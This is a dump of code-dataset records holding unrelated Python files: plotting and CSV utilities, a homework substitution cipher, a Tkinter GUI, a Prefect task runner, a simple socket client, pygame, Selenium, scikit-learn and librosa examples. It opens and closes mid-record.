ax1.hist(m_s, density=True, histtype='stepfilled', alpha=0.8, label='M')\n ax1.legend(loc='best', frameon=False)\n ax1.set_xlim([-5,5])\n \n ax2.scatter(xs,log_ratio_store[0],label='True p/q',alpha=0.9,s=10.,c='b')\n ax2.scatter(xs,log_r_p_from_m_direct_store[-1][:,0]-log_r_p_from_m_direct_store[-1][:,1],label='CoB p/q',alpha=0.9,s=10.,c='r')\n ax2.scatter(xs,-log_ratio_store[0],label='True q/p',alpha=0.9,s=10.,c='b')\n ax2.scatter(xs,log_r_p_from_m_direct_store[-1][:,1]-log_r_p_from_m_direct_store[-1][:,0],label='CoB q/p',alpha=0.9,s=10.,c='r')\n\n ax2.set_xlabel(\"Samples\")\n ax2.set_ylabel(\"Log Ratio\")\n ax2.legend(loc='best')\n ax2.set_xlim([-6,10])\n ax2.set_ylim([-1000,1000])\n \n pm = [np.squeeze(norm.logpdf(x,mu_1,scale_p)-cauchy.logpdf(x,mu_3,scale_m)) for x in xs]\n qm = [np.squeeze(norm.logpdf(x,mu_2,scale_q)-cauchy.logpdf(x,mu_3,scale_m)) for x in xs]\n ax4.scatter(xs,pm,label='True p/m',alpha=0.9,s=10.,c='b')\n ax4.scatter(xs,log_r_p_from_m_direct_store[-1][:,0]-log_r_p_from_m_direct_store[-1][:,2],label='CoB p/m',alpha=0.9,s=10.,c='r')\n ax4.scatter(xs,qm,label='True q/m',alpha=0.9,s=10.,c='y')\n 
ax4.scatter(xs,log_r_p_from_m_direct_store[-1][:,1]-log_r_p_from_m_direct_store[-1][:,2],label='CoB q/m',alpha=0.9,s=10.,c='g')\n\n ax4.set_xlabel(\"Samples\")\n ax4.set_ylabel(\"Log Ratio\")\n ax4.legend(loc='best')\n ax4.set_xlim([-6,10])\n ax4.set_ylim([-1000,1000])\n \n \n rat = log_r_p_from_m_direct_store[-1][:,0]-log_r_p_from_m_direct_store[-1][:,1]\n d = [np.squeeze(norm.logpdf(x,mu_2,scale_q)) for x in xs]\n b = [np.squeeze(norm.logpdf(x,mu_1,scale_p)) for x in xs]\n ax3.scatter(xs,b,label='True P',alpha=0.9,s=5.)\n ax3.scatter(xs,rat+d,label='P',alpha=0.9,s=5.)\n\n ax3.set_xlabel(\"Samples\")\n ax3.set_ylabel(\"Log P(x)\")\n ax3.legend(loc='best')\n ax3.set_xlim([-6,10])\n ax3.set_ylim([-600,400])\n \n# plt.savefig(data_dir+str(mu_3)+\".jpg\")\n \n \n ","sub_path":"models/ratio_utils.py","file_name":"ratio_utils.py","file_ext":"py","file_size_in_byte":9389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"207807792","text":"import csv\n\n# basic import: nested lists\ndef import_data(filename):\n imported_data = []\n with open(filename) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n return imported_data\n\n\ndef count_games(filename):\n imported_data = []\n with open(filename) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n return len(imported_data) # there are as many nested lists (items) as games\n\n\ndef decide(file_name, year=None):\n imported_data = []\n with open(file_name) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n years = []\n for item in range(len(imported_data)):\n years.append(imported_data[item][2])\n if year is not None:\n if str(year) in years:\n return True\n else:\n return False\n else:\n return \"No year entered.\"\n\n\ndef get_latest(file_name):\n imported_data = []\n with open(file_name) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n years = []\n for item in range(len(imported_data)):\n years.append(imported_data[item][2])\n latest_game = max(years)\n latest_title = str(imported_data[years.index(latest_game)][0])\n return latest_title\n\n\ndef count_by_genre(file_name, genre=None):\n # import data as nested lists\n imported_data = []\n with open(file_name) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n# make a list of genres\n genres = []\n for item in range(len(imported_data)):\n genres.append(imported_data[item][3])\n genres = list(set(genres)) # so every genre appears only once\n if genre is not None:\n if genre in genres:\n occurrence = 0\n for game in range(len(imported_data)):\n if str(genre) in imported_data[game][3]: # checks every nested list (=game),\n # and if the 4rd element, which is the genre, is the same as the one in the function call,\n # the count is increased\n occurrence += 1\n return occurrence\n else:\n return \"No such genre.\"\n else: # when no genre is given\n return \"No genre entered.\"\n\n\ndef get_line_number_by_title(file_name, title=None):\n # import data as nested lists\n imported_data = []\n with open(file_name) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n for row in readCSV:\n imported_data.append(row)\n try:\n if title is not None: # when something is given as title in the function call\n for item in 
range(len(imported_data)):\n                if title == imported_data[item][0]:  # when it is found in the file\n                    line_number = int(item) + 1  # int(item) is just the index of the game, line number needs to start from 1, instead of 0\n                    return line_number\n            else:  # for-else: the loop finished without finding the title\n                raise ValueError\n        else:  # when nothing is given as title in the function call\n            raise ValueError\n    except ValueError:  # when no title is given/found\n        return \"No such title.\"\n\n\ndef sort_abc(file_name):\n    # import data as nested lists\n    imported_data = []\n    with open(file_name) as csvfile:\n        readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n        for row in readCSV:\n            imported_data.append(row)\n    titles = []\n    for item in imported_data:\n        titles.append(item[0])  # append the 0th element of every nested list, which is the title\n    titles = sorted(titles)\n    return titles\n\n\n# alternative sorting\ndef sort_abc_alg(file_name):\n    # import data as nested lists\n    imported_data = []\n    with open(file_name) as csvfile:\n        readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n        for row in readCSV:\n            imported_data.append(row)\n    unsorted_titles = []\n    sorted_titles = []\n    for item in imported_data:\n        unsorted_titles.append(item[0])\n    while unsorted_titles:\n        minimum = unsorted_titles[0]  # it uses the very first element as minimum\n        for t in unsorted_titles:\n            if t < minimum:  # checks every other element, whether they are smaller\n                minimum = t\n        sorted_titles.append(minimum)  # the smallest remaining title is appended to the sorted list\n        unsorted_titles.remove(minimum)\n    return sorted_titles  # titles are appended to this list in alphabetical order\n\n\ndef get_genres(file_name):\n    imported_data = []\n    with open(file_name) as csvfile:\n        readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n        for row in readCSV:\n            imported_data.append(row)\n    genres = []\n    for item in range(len(imported_data)):  # check all games\n        genres.append(imported_data[item][3])  # append the genre\n    genres = sorted(list(set(genres)), key=str.lower)  # unique genres in alphabetical order, regardless of their case (uppercase sorts before lowercase)\n    return genres\n\n\ndef when_was_top_sold_fps(file_name):\n    imported_data = []\n    with open(file_name) as csvfile:\n        readCSV = csv.reader(csvfile, delimiter=\"\\t\")\n        for row in readCSV:\n            imported_data.append(row)\n    try:\n        fps_games = []\n        for item in range(len(imported_data)):  # checking every game's genre\n            if imported_data[item][3] == \"First-person shooter\":  # every fps is appended\n                fps_games.append(imported_data[item])\n        copies_sold = []\n        for item in fps_games:\n            copies_sold.append(float(item[1]))  # creating a list of the amount sold\n        top_sold = max(copies_sold)  # this is the highest\n        for t in range(len(fps_games)):\n            if str(top_sold) in fps_games[t]:  # if the highest number is found in that game's list, its release is what we are looking for\n                release_of_top_sold_game = fps_games[t][2]\n                return int(release_of_top_sold_game)\n    except ValueError:\n        return 'No such game with genre \"First-person shooter\".'\n\n\n# count_games(\"game_stat.txt\")\n# decide(\"game_stat.txt\")\n# get_latest(\"game_stat.txt\")\n# count_by_genre(\"game_stat.txt\")\n# get_line_number_by_title(\"game_stat.txt\")\n# sort_abc(\"game_stat.txt\")\n# sort_abc_alg(\"game_stat.txt\")\n# get_genres(\"game_stat.txt\")\n# when_was_top_sold_fps(\"game_stat.txt\")\n#\n# def call_all(file_name):\n#     count_games(file_name)\n#     decide(file_name)\n#     get_latest(file_name)\n#     count_by_genre(file_name)\n
#     get_line_number_by_title(file_name)\n#     sort_abc(file_name)\n#     sort_abc_alg(file_name)\n#     get_genres(file_name)\n#     when_was_top_sold_fps(file_name)\n#\n# call_all(\"game_stat.txt\")\n","sub_path":"reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"456487631","text":"\n'''Given a text to encode and a key, the following cryptographic scheme is proposed:\n\n- every character C with C<'a' or C>'z' is removed from the key. \n- of each of the remaining characters, all occurrences except the last are deleted\n  from the key, producing an UNORDERED sequence. \n- the characters present in the string cleaned up this way are the only characters of\n  the text to be encoded, i.e. substituted in the encrypted text (the others remain unchanged). \n- the SORTED sequence of the characters left in the key is put in correspondence\n  with the UNORDERED sequence of the characters obtained in the previous step.\n\nAs an example of its application, consider the key\n    \"sim sala Bim!\"\nafter the deletions the key produces the UNORDERED sequence\n    \"slaim\"\n\nThe only characters of the text to undergo encoding are 's', 'l', 'a', 'i' and 'm'. \nTo know what these characters will be encoded as, consider the following correspondence\nbetween sequences:\n    \"ailms\" (sorted sequence of the same characters)\n    \"slaim\" (unordered sequence obtained from the key)\nthis determines the pairings (a,s), (i,l), (l,a), (m,i) and (s,m);\nso 'a' will be encoded as 's', 'i' as 'l', and so on.\n\nUsing the key \"sim sala Bim!\" to encode the text \"il mare sa di sale\" yields the\nfollowing encrypted text:\n    \"il mare sa di sale\" (plain text)\n    \"la isre ms dl msae\" (encrypted text)\n\nDecoding the encrypted text works on the same key but substitutes the letters\npresent in the unordered sequence with those of the sorted sequence.\nSo in the previous example the substitutions are inverted:\n    (s, a), (l, i), (a, l), (i, m) and (m, s)\n\nFor other examples see the file grade03.txt\n\nImplement the two functions\n    codifica(chiave, testo_in_chiaro) -> testo_crittografato\n    decodifica(chiave, testo_crittografato) -> testo_in_chiaro\n\nWARNING: DO NOT USE ACCENTED LETTERS.\nWARNING: If the grader does not finish within 30 seconds, the exercise score is zero.\n'''\n\ndef keyGen(strKey):\n    lsBase=list(strKey)\n    newlsBase=lsBase.copy()  # copy of the list used in the for loop\n    D=set()  # set used to collect the characters already seen\n    for i in range(len(lsBase)-1,-1,-1):\n        # if the character is not in D and is a valid character\n        charr=lsBase[i]\n        if charr not in D and (charr >= 'a' and charr <= 'z'): \n            D.add(charr)\n        else:\n            del lsBase[i]\n    # build the encoding and decoding keys in a convenient type\n    LsEnd=sorted(lsBase)\n    txtBase=''.join(lsBase)\n    txtEnd=''.join(LsEnd)\n    return (txtBase,txtEnd)\n\ndef Trasform(lTesto,ls1,ls2):\n    for i in range(len(lTesto)):\n        x = lTesto[i]\n        y = ls1.find(x) \n        if y != -1:\n            lTesto[i] = ls2[y]\n    return lTesto\n\ndef codifica(chiave, testo):\n    '''insert your implementation here'''\n    lsb,lse=keyGen(chiave)\n    lsTesto=list(testo)  # converted to a list because str is immutable\n    return ''.join(Trasform(lsTesto,lse,lsb))\n\n\ndef decodifica(chiave, testo):\n    '''insert your implementation here'''\n    lsb,lse=keyGen(chiave)\n    lsTesto=list(testo)\n    return 
''.join(Trasform(lsTesto,lsb,lse))","sub_path":"students/1792394/homework01/program03.py","file_name":"program03.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"437360451","text":"import os\nimport tkFont\nimport ttk\nimport Menu as m\nimport CourseDictionary\nimport tkMessageBox\nimport CourseSuggestor\n\nfrom Tkinter import *\nfrom ttk import Frame, Label, Entry, Button\n\nclass Example(Frame):\n    '''\n    Function to initialise GUI\n    '''\n    def __init__(self, parent):\n        Frame.__init__(self, parent)\n        self.parent = parent\n        self.initUI()\n        self.tableHeaders = [\"Si No.\",\"Course Name\",\"Course Description\"]\n\n    '''\n    Function to build GUI with required elements\n    '''\n    def initUI(self):\n        self.parent.title(\"Course Suggestor\")\n        self.pack(fill=BOTH, expand=1)\n        self.parent.grid_rowconfigure(0, weight=3)\n        self.grid_columnconfigure(0, weight=1, minsize=25)\n\n        self.frameInterests = Frame(self)\n        self.frameInterests.pack(fill=X)\n\n        self.lblInterests = Label(self.frameInterests, text=\"Enter your Interests\", width=20)\n        self.lblInterests.pack(side=LEFT, padx=15, pady=15)\n\n        self.entryInterests = Entry(self.frameInterests)\n        self.entryInterests.pack(fill=X, padx=5, pady=5, expand=True)\n\n        self.frameCourses = Frame(self)\n        self.frameCourses.pack(fill=X)\n\n        self.lblInterests = Label(self.frameCourses, text=\"Select Your Department\")\n        self.lblInterests.pack(side=LEFT, padx=5, pady=5)\n\n\n        self.courses = CourseDictionary.coursesOffered.keys()\n\n        self.lb = Listbox(self,width=135, height=20, selectmode=\"multiple\")#, yscrollcommand=self.scrollBar.set)\n        for i in self.courses:\n            self.lb.insert(END, i)\n\n        self.lb.bind(\"<<ListboxSelect>>\", self.onSelect)\n        self.lb.pack()#pady=15)\n\n        self.frameGo = Frame(self)\n        self.frameGo.pack(fill=X)\n\n        self.goButton = Button(self.frameGo, text=\"Go\", command=self.onGo)\n        self.goButton.pack(fill=X, padx=3, pady=3)\n\n    '''\n    Function to name the columns in the Tree View\n    '''\n    def _build_tree(self):\n        for col in [\"Si No.\",\"Course Name\",\"Course Description\"]:\n            self.tree.heading(col, text=col.title(),command=lambda c=col: sortby(self.tree, c, 0))\n        col=\"Course Description\"\n\n    '''\n    Function to display results in the Tree View\n    '''\n    def showResults(self):\n        self.tree = ttk.Treeview(self,columns=[\"Si No.\",\"Course Name\",\"Course Description\"], show=\"headings\",selectmode=\"none\")\n        self.tree.pack(fill=BOTH,expand=YES)\n        self._build_tree()\n\n        self.var = StringVar()\n        self.label = Label(self, text=0, textvariable=self.var)\n        self.label.pack()\n\n    '''\n    Call back Function to perform an action when the user selects a concentration\n    '''\n    def onSelect(self, val):\n        pass\n\n    '''\n    Call back function on clicking GO button\n    '''\n    def onGo(self):\n        self.showResults()\n        if len(self.entryInterests.get())<4:\n            self.messageBox = tkMessageBox.showerror(\"Error!\" , \"Enter a keyword (len > 3) of interest!\")\n        else:\n            if len(self.lb.curselection()) > 0:\n                courseSel=[]\n                for x in self.lb.curselection():\n                    courseSel.append(CourseDictionary.coursesOffered[self.courses[x]])\n                self.suggestCourses(m.prepareFile(courseSel), self.entryInterests.get())\n            else:\n                self.messageBox = tkMessageBox.showerror(\"Error!\" , \"Select at least one course!\")\n\n    '''\n    Functions to get suggestions based on user input\n    '''\n    def suggestCourses(self,fileToRead, interestData):\n        courseDesc,courseName = CourseSuggestor.readCSV(fileToRead)\n        queryIndex=len(courseDesc)\n
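        # (reviewer note) the interest text is appended below as the last document of the\n        # course-description corpus; CourseSuggestor presumably ranks the other documents by\n        # textual similarity to it, with queryIndex recording its position in the corpus.\n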
        numberOfPredictions=10\n        courseDesc.append(interestData)\n        suggestions = CourseSuggestor.suggestCourses(courseDesc,20)\n        i=0\n        suggestionsMax = numberOfPredictions\n        if len(suggestions) < numberOfPredictions:\n            print(\"Couldn't find many courses with the provided Description. Here is the list of all suggestions\")\n            suggestionsMax = len(suggestions)\n        tableHeaders = [\"Si No.\",\"Course Name\",\"Course Description\"]\n        for index, score in suggestions[:suggestionsMax+1]:\n            if not (index >= len(courseName)-1):\n                self.tree.insert('','end',values=[i+1,courseName[index],courseDesc[index]])\n                i+=1\n        os.remove(fileToRead)\n\n    '''\n    Function that aligns the GUI in the center of the screen\n    '''\n    def centerWindow(self):\n\n        w = 990\n        h = 1390\n\n        sw = self.parent.winfo_screenwidth()\n        sh = self.parent.winfo_screenheight()\n\n        x = (sw - w)/2\n        y = (sh - h)/2\n        self.parent.geometry('%dx%d+%d+%d' % (w, h, x, y))\n\n'''\n    Main function to start and run the program\n'''\ndef main():\n    root = Tk()\n    ex = Example(root)\n    root.mainloop()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"src/Gui.py","file_name":"Gui.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"647572807","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nGiven a 32-bit signed integer, reverse the digits of the integer.\n\"\"\"\n\n\nclass Solution:\n    def reverse(self, x):\n        \"\"\"\n        :type x: int\n        :rtype: int\n        \"\"\"\n        str_x = str(x)\n        result = [str_x[0]] if str_x[0] == '-' else []\n        for idx in range(len(str_x)-1, -1, -1):\n            if idx == 0 and str_x[idx] == '-':\n                continue\n            result.append(str_x[idx])\n        result = int(''.join(result))\n        return result if -(2**31) <= result <= 2**31-1 else 0\n\n\nif __name__ == \"__main__\":\n    result = Solution().reverse(x=120)\n    print(result)\n","sub_path":"reverse/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"481800006","text":"import copy\nimport warnings\nfrom typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union\n\nimport prefect\nfrom prefect.client import Client\nfrom prefect.core import Edge, Task\nfrom prefect.engine.cloud.utilities import prepare_state_for_cloud\nfrom prefect.engine.result import NoResult\nfrom prefect.engine.result_handlers import ResultHandler\nfrom prefect.engine.runner import ENDRUN, call_state_handlers\nfrom prefect.engine.state import Cached, Failed, Mapped, State\nfrom prefect.engine.task_runner import TaskRunner, TaskRunnerInitializeResult\nfrom prefect.utilities.graphql import with_args\n\n\nclass CloudTaskRunner(TaskRunner):\n    \"\"\"\n    TaskRunners handle the execution of Tasks and determine the State of a Task\n    before, during and after the Task is run.\n\n    In particular, through the TaskRunner you can specify the states of any upstream dependencies,\n    and what state the Task should be initialized with.\n\n    Args:\n        - task (Task): the Task to be run / executed\n        - state_handlers (Iterable[Callable], optional): A list of state change handlers\n            that will be called whenever the task changes state, providing an\n            opportunity to inspect or modify the new state. 
The handler\n will be passed the task runner instance, the old (prior) state, and the new\n (current) state, with the following signature: `state_handler(TaskRunner, old_state, new_state) -> State`;\n If multiple functions are passed, then the `new_state` argument will be the\n result of the previous handler.\n - result_handler (ResultHandler, optional): the handler to use for\n retrieving and storing state results during execution (if the Task doesn't already have one);\n if not provided here or by the Task, will default to the one specified in your config\n \"\"\"\n\n def __init__(\n self,\n task: Task,\n state_handlers: Iterable[Callable] = None,\n result_handler: ResultHandler = None,\n ) -> None:\n self.client = Client()\n super().__init__(\n task=task, state_handlers=state_handlers, result_handler=result_handler\n )\n\n def _heartbeat(self) -> None:\n try:\n task_run_id = self.task_run_id # type: ignore\n self.client.update_task_run_heartbeat(task_run_id) # type: ignore\n except:\n warnings.warn(\"Heartbeat failed for Task '{}'\".format(self.task.name))\n\n def call_runner_target_handlers(self, old_state: State, new_state: State) -> State:\n \"\"\"\n A special state handler that the TaskRunner uses to call its task's state handlers.\n This method is called as part of the base Runner's `handle_state_change()` method.\n\n Args:\n - old_state (State): the old (previous) state\n - new_state (State): the new (current) state\n\n Returns:\n - State: the new state\n \"\"\"\n raise_on_exception = prefect.context.get(\"raise_on_exception\", False)\n\n try:\n new_state = super().call_runner_target_handlers(\n old_state=old_state, new_state=new_state\n )\n except Exception as exc:\n msg = \"Exception raised while calling state handlers: {}\".format(repr(exc))\n self.logger.debug(msg)\n if raise_on_exception:\n raise exc\n new_state = Failed(msg, result=exc)\n\n task_run_id = prefect.context.get(\"task_run_id\")\n version = prefect.context.get(\"task_run_version\")\n\n try:\n cloud_state = prepare_state_for_cloud(new_state)\n self.client.set_task_run_state(\n task_run_id=task_run_id,\n version=version,\n state=cloud_state,\n cache_for=self.task.cache_for,\n )\n except Exception as exc:\n self.logger.debug(\n \"Failed to set task state with error: {}\".format(repr(exc))\n )\n raise ENDRUN(state=new_state)\n\n if version is not None:\n prefect.context.update(task_run_version=version + 1) # type: ignore\n\n return new_state\n\n def initialize_run( # type: ignore\n self, state: Optional[State], context: Dict[str, Any]\n ) -> TaskRunnerInitializeResult:\n \"\"\"\n Initializes the Task run by initializing state and context appropriately.\n\n Args:\n - state (Optional[State]): the initial state of the run\n - context (Dict[str, Any]): the context to be updated with relevant information\n\n Returns:\n - tuple: a tuple of the updated state, context, and upstream_states objects\n \"\"\"\n\n # if the map_index is not None, this is a dynamic task and we need to load\n # task run info for it\n map_index = context.get(\"map_index\")\n if map_index not in [-1, None]:\n try:\n task_run_info = self.client.get_task_run_info(\n flow_run_id=context.get(\"flow_run_id\", \"\"),\n task_id=self.task.id,\n map_index=map_index,\n )\n\n # if state was provided, keep it; otherwise use the one from db\n state = state or task_run_info.state # type: ignore\n context.update(\n task_run_version=task_run_info.version, # type: ignore\n task_run_id=task_run_info.id, # type: ignore\n )\n except Exception as exc:\n 
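# (reviewer note) if the task-run info cannot be fetched from Cloud, the exception is\n                # logged and the run is failed below via ENDRUN rather than re-raised here.\n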
                self.logger.debug(\n                    \"Failed to retrieve task state with error: {}\".format(repr(exc))\n                )\n                if state is None:\n                    state = Failed(\n                        message=\"Could not retrieve state from Prefect Cloud\",\n                        result=exc,\n                    )\n                raise ENDRUN(state=state)\n\n        # we assign this so it can be shared with heartbeat thread\n        self.task_run_id = context.get(\"task_run_id\")  # type: ignore\n        context.update(cloud=True)\n\n        return super().initialize_run(state=state, context=context)\n","sub_path":"src/prefect/engine/cloud/task_runner.py","file_name":"task_runner.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"69324364","text":"import socket\n\ns = socket.socket()\n\n\ndef getserver():\n    try:\n        host = input('What is the IP of the host?\\n>>')\n        port = 12345\n        s.connect((host, port))\n    except:\n        print('Couldn\\'t connect, try again')\n        getserver()\n\n\ngetserver()\n\n\nclient = True\nwhile client:\n    svstr = input('Input> ')\n    if not svstr:\n        continue\n    svbyte = svstr.encode('utf-8')\n    try:\n        s.send(svbyte)\n    except:\n        print('Connection lost, exiting...')\n        break\n    r = s.recv(1024).decode('utf-8')\n    if r == 'exit':\n        break\n    else:\n        print(r)\ns.close()\n\n","sub_path":"client_cmd.py","file_name":"client_cmd.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"426852686","text":"#-*- coding:utf-8 -*-\r\n#test_map.py\r\n\r\nimport pygame\r\nfrom pygame.locals import *\r\n\r\npygame.init()\r\n\r\ns_width = 600\r\ns_height = 600\r\nclock = pygame.time.Clock()\r\nfps = 30\r\nrunning = True\r\n\r\ngame_screen = pygame.display.set_mode((s_width, s_height), pygame.DOUBLEBUF)\r\nbackground = pygame.Surface(game_screen.get_size())  # Creating a new Surface\r\n#background = background.convert()  # Converting the pixels for \"pygame\"\r\nbackground.fill((255,0,0))  # Background color\r\n\r\nclass Player(pygame.sprite.DirtySprite):  # Inheriting from DirtySprite\r\n\r\n    def __init__(self):\r\n        \r\n        pygame.sprite.DirtySprite.__init__(self)  # Initializing the inherited class\r\n        #self.image = pygame.image.load(\"poo1.png\")  # random image\r\n        self.image = pygame.Surface((50,50))  # Creating a new Surface\r\n        self.rect = self.image.get_rect()  # Creating a rect the size of the Surface\r\n        self.rect = pygame.draw.rect(self.image, (0,255,0), self.rect)\r\n        self.speed = 10\r\n        # Drawing a square on the screen.\r\n\r\n    def update(self):\r\n        #self.p_move()  # calling p_move() to update the object\r\n        #print(self.rect)\r\n        self.dirty = 1  # marks the sprite so it gets redrawn\r\n\r\n    def p_move(self):\r\n        # Updated:\r\n        # instead of using update() with arguments,\r\n        # p_move takes rect.x and rect.y and moves them\r\n\r\n        key = pygame.key.get_pressed()\r\n        if key[pygame.K_LEFT]:\r\n            self.rect.x -= self.speed\r\n        if key[pygame.K_RIGHT]:\r\n            self.rect.x += self.speed\r\n        if key[pygame.K_UP]:\r\n            self.rect.y -= self.speed\r\n        if key[pygame.K_DOWN]:\r\n            self.rect.y += self.speed\r\n\r\n        # Keeping the object inside the screen\r\n        if self.rect.left < 0:\r\n            self.rect.x += self.speed\r\n        elif self.rect.right > s_width:\r\n            self.rect.x -= self.speed\r\n\r\n        if self.rect.top < 0:\r\n            self.rect.y += self.speed\r\n        elif self.rect.bottom > s_height:\r\n            self.rect.y -= self.speed\r\n\r\nplayer = Player()\r\n\r\nallsprites = pygame.sprite.LayeredDirty(player)  # Adding the object to the \"group\"\r\nallsprites.clear(game_screen, background)  # Clearing the screen\r\n\r\nwhile(running):\r\n\r\n    for event in 
pygame.event.get():\r\n        if event.type == pygame.QUIT:\r\n            running = False\r\n\r\n    allsprites.update()\r\n    player.p_move()\r\n\r\n    rects = allsprites.draw(game_screen)  # Drawing the group's objects on the screen\r\n    pygame.display.update(rects)  # Updating the group's objects\r\n    clock.tick(fps)\r\n    #print(clock.get_fps())\r\n\r\npygame.quit()\r\n","sub_path":"Pygame/test_maps/test_map.py","file_name":"test_map.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"597822155","text":"from typing import Union\n\nfrom selenium.common.exceptions import WebDriverException\nfrom utilities.driver_helpers.selectors import Selector\nfrom utilities.exceptions import PageObjectUrlException\n\n\nclass Page(object):\n    \"\"\"A page object.\n\n    Page objects form the foundation for automation testing by programmatically simulating the\n    page being tested.\n\n    :usage example:\n        from utilities import Page\n\n        class Login(Page):\n            ROOT_LOCATOR: Selector = Selectors.class_name('login-container')\n            URL_PATH: str = '/login'\n\n        login_page = Login(selenium)\n        login_page.visit()\n        assert login_page.loaded is True\n    \"\"\"\n\n    ROOT_LOCATOR: Selector = None\n    URL_PATH: str = None\n\n    def __init__(self, driver, base_url=''):\n        \"\"\"Initialize the page.\n\n        :param driver: An instance of Selenium Web Driver.\n        :param base_url: The base url of the application.\n        \"\"\"\n        self.base_url = base_url\n        self.driver = driver\n\n    @property\n    def loaded(self) -> bool:\n        \"\"\"Boolean check for whether the page has loaded successfully.\"\"\"\n        if self.ROOT_LOCATOR is None:\n            return self.driver.current_url == self.url\n\n        try:\n            return bool(self.driver.wait_until_visible(*self.ROOT_LOCATOR))\n        except WebDriverException:\n            return False\n\n    @property\n    def url(self) -> Union[str, None]:\n        \"\"\"Build a URL based on the base url and optional path.\"\"\"\n        url = self.base_url\n\n        if self.URL_PATH is not None:\n            url = f'{self.base_url}{self.URL_PATH}'\n\n        if not url:\n            return None\n\n        return url\n\n    def wait_for_page_to_load(self, wait_time=None) -> Union[object, None]:\n        \"\"\"Wait for the page to load, then return the page.\n\n        :param wait_time: The amount of time until a TimeoutException occurs.\n        \"\"\"\n        if self.ROOT_LOCATOR is None:\n            self.driver.wait_until_url_contains(self.url, wait_time=wait_time)\n        else:\n            try:\n                self.driver.wait_until_visible(*self.ROOT_LOCATOR, wait_time=wait_time)\n            except WebDriverException:\n                return None\n        return self\n\n    def visit(self) -> object:\n        \"\"\"Open a page via url.\"\"\"\n        if self.url:\n            self.driver.get(self.url)\n            self.wait_for_page_to_load()\n            return self\n        raise PageObjectUrlException(\n            'A base URL or URL_PATH must be set in order to visit this page.',\n        )\n","sub_path":"utilities/page_object_models/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"609937317","text":"from sklearn.linear_model import LinearRegression\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\nx = [[80, 86],\n[82, 80],\n[85, 78],\n[90, 90],\n[86, 82],\n[82, 90],\n[78, 80],\n[92, 94]]\ny = [84.2, 80.6, 80.1, 90, 83.2, 87.6, 79.4, 93.4]\n\nscore_data = pd.DataFrame(x, columns=['english', 'math'])\nprint(score_data)\nscore_data['mean_score'] = y\nprint(score_data)\n\n\ndef plot_iris(data, col1, col2):\n
    sns.lmplot(data=data, x=col1, y=col2, hue=\"mean_score\", fit_reg=True)\n    # data: the DataFrame; x, y: the column names for the x and y axes;\n    # hue: the target value; fit_reg: whether to fit a regression line\n    plt.xlabel(col1)\n    plt.ylabel(col2)\n    plt.title('mean_score data distribution')\n    plt.show()\n\nplot_iris(score_data, 'english', 'math')\n\n\n# instantiate the API\nestimator = LinearRegression()\n# train using the fit method\nestimator.fit(x,y)\n\ncoef = estimator.coef_\nintercept = estimator.intercept_\nprint(coef, intercept)\n\nprint(estimator.predict([[100, 80]]))","sub_path":"7.Regression/1.regression.py","file_name":"1.regression.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"450775111","text":"import librosa\nimport matplotlib.pyplot as plt\nimport librosa.display\nimport numpy as np\nimport streamlit as st\nimport glob\n\n\n@st.cache\ndef get_dir_overview():\n    \"\"\"\n    Adopt this method for the dataset at hand\n    :return:\n    \"\"\"\n    # find all files\n    files = glob.glob(\"dataset/*.wav\")\n\n    # build a label->[sample1, sample2, sample3, ...] mapping\n    data = {f'{i}': [] for i in range(50)}\n    for sample in files:\n        label = sample.split(\"-\")[-1].split(\".\")[0]\n        data[label].append(sample)\n\n    return data\n\n\n@st.cache\ndef load_audio_sample(file_path: str):\n    y, sr = librosa.load(file_path, sr=22050)\n\n    return y, sr, file_path\n\n\ndef plot_spectrogram(y, sr, file_path):\n    pass\n\n\ndef plot_linear_spectrogram(y, sr, file_path):\n    plt.close('all')\n    D = librosa.stft(y)  # STFT of y\n    S_db = librosa.amplitude_to_db(np.abs(D), ref=np.max)\n    plt.close(\"all\")\n    fig, ax = plt.subplots()\n    img = librosa.display.specshow(S_db, x_axis='time', y_axis='linear', ax=ax)\n    ax.set(title='Linear-scale spectrogram')\n    fig.colorbar(img, ax=ax, format=\"%+2.f dB\")\n\n    return plt.gcf()\n\n\ndef plot_log_spectrogram(y):\n    plt.close(\"all\")\n    fig, ax = plt.subplots()\n    D = 